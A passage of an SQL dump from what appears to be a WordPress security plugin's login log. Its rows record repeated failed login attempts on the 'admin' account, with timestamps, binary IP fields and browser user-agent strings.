Firefox/78.0'),(4040,6590,1629470315.912132,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ԯ�','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(4041,6592,1629473375.664953,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(4042,6594,1629474930.164937,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���n��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(4043,6596,1629476963.498919,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����f�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4044,6622,1629477808.836795,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z�_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4045,6623,1629478035.485172,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(4046,6626,1629479595.148506,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C�=�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(4047,6627,1629480094.582419,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4048,6628,1629480699.414701,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����dl','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4049,6629,1629481198.425785,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����8�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(4050,6630,1629481238.984295,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(4051,6631,1629481244.627128,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(4052,6632,1629481249.428683,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�K�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(4053,6633,1629481258.036625,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4054,6634,1629481861.865868,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4055,6635,1629482845.636602,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��mW�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(4056,6636,1629483019.479292,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VE3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4057,6638,1629484184.903433,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\"<�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4058,6639,1629484510.564865,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����q','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(4059,6640,1629484756.974829,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4060,6640,1629484757.029742,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4061,6641,1629485362.873643,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4062,6642,1629485978.023941,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����E.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4063,6643,1629486159.580999,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����y','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(4064,6644,1629486509.474819,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4065,6645,1629487097.320362,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4066,6646,1629487700.311169,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4067,6646,1629487700.371600,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4068,6648,1629488261.779761,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Kw��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4069,6649,1629488887.078271,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\̆�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4070,6650,1629489450.333191,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(4071,6651,1629489500.949107,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���D�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4072,6652,1629490177.913690,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��xO�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4073,6653,1629490860.353008,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��1�m�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4074,6654,1629491527.266427,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4075,6655,1629492246.694003,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6\'iX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4076,6656,1629492683.513380,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���(%�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(4077,6657,1629492980.274529,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Oe,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4078,6658,1629493268.814718,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(4079,6659,1629493270.887807,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(4080,6660,1629493273.084899,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(4081,6661,1629493703.941871,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-@6�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4082,6662,1629494298.145901,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gm','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(4083,6663,1629494501.068642,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4084,6664,1629494520.836602,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4085,6665,1629494526.010556,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4086,6666,1629494531.593793,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4ʎ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4087,6667,1629495238.053521,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@rP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4088,6669,1629496059.330340,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���`J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4089,6670,1629496276.728913,1,'loginFailInvalidUsername','danidrenovci',0,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4090,6671,1629496283.243819,1,'loginFailInvalidUsername','danidrenovci',0,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4091,6671,1629496283.297716,1,'loginFailInvalidUsername','danidrenovci',0,'\0\0\0\0\0\0\0\0\0\0��4�:m','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4092,6672,1629496858.313530,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4093,6675,1629498540.891384,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4094,6705,1629500248.791972,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4095,6708,1629502351.291357,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���(%�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(4096,6711,1629503959.686403,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�H�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(4097,6712,1629504861.689067,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���_l','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4098,6713,1629505576.794334,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/� ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(4099,6714,1629505856.712208,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4100,6716,1629507193.601031,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(4101,6717,1629507849.724598,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4102,6718,1629508818.144793,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��իо','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(4103,6719,1629508911.860956,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Vw�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4104,6724,1629513146.811820,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4105,6730,1629516967.372540,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y`Z}','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(4106,6732,1629519174.256536,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(4107,6733,1629519485.095957,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Kw�\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4108,6734,1629520731.308968,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g/<,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4109,6735,1629522028.093694,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;N�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4110,6737,1629523321.471676,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B�|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4111,6738,1629524154.051925,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���s','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(4112,6741,1629526044.300820,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4113,6743,1629527464.937281,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\"E','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(4114,6744,1629528036.914184,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4115,6746,1629529130.495890,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���}7�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(4116,6747,1629529307.847839,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���7�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4117,6748,1629529946.692644,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��{+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4118,6749,1629530544.510892,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4119,6749,1629530544.946159,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4120,6769,1629532452.558573,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(4121,6770,1629532978.856909,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��A<�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4122,6771,1629533580.438882,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4123,6772,1629534072.792137,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(4124,6773,1629534155.401089,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���옔','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4125,6774,1629534741.193508,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��}:w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4126,6775,1629535359.574121,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���˰R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4127,6778,1629537226.849801,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\"d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4128,6780,1629537878.003228,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4129,6781,1629538544.774094,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4130,6784,1629539978.632057,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4131,6787,1629540695.022910,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4132,6788,1629541395.734782,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��+�Hu','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4133,6791,1629543783.030149,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���!','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(4134,6792,1629544466.395032,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4135,6793,1629545267.959423,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����#X','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4136,6796,1629547740.297671,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4137,6797,1629548585.405874,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4138,6799,1629550385.595087,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Oe,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4139,6800,1629551288.189504,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4140,6801,1629551619.072942,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-(��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(4141,6802,1629552224.483395,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��P��F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4142,6804,1629553165.216980,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(4143,6805,1629554115.122066,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��p�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4144,6813,1629558987.005540,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4145,6815,1629560035.572422,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���l��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4146,6815,1629560035.637257,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���l��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4147,6819,1629564513.363383,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���cr5','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(4148,6821,1629566876.247638,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���E\"�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(4149,6823,1629569257.876879,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���1N','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(4150,6824,1629570516.539233,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��M��)','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(4151,6826,1629572363.797704,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4152,6827,1629572603.140857,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@vs','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4153,6828,1629572843.823534,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@sP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4154,6829,1629573105.090591,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(4155,6830,1629573109.081817,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Q�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4156,6831,1629573327.284246,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4157,6832,1629573616.701002,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4158,6833,1629573853.456666,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4159,6834,1629574079.854789,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4160,6835,1629574370.687348,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4161,6836,1629574370.985943,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���1N','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(4162,6836,1629574374.012291,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���1N','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(4163,6837,1629574656.410582,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-P�0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 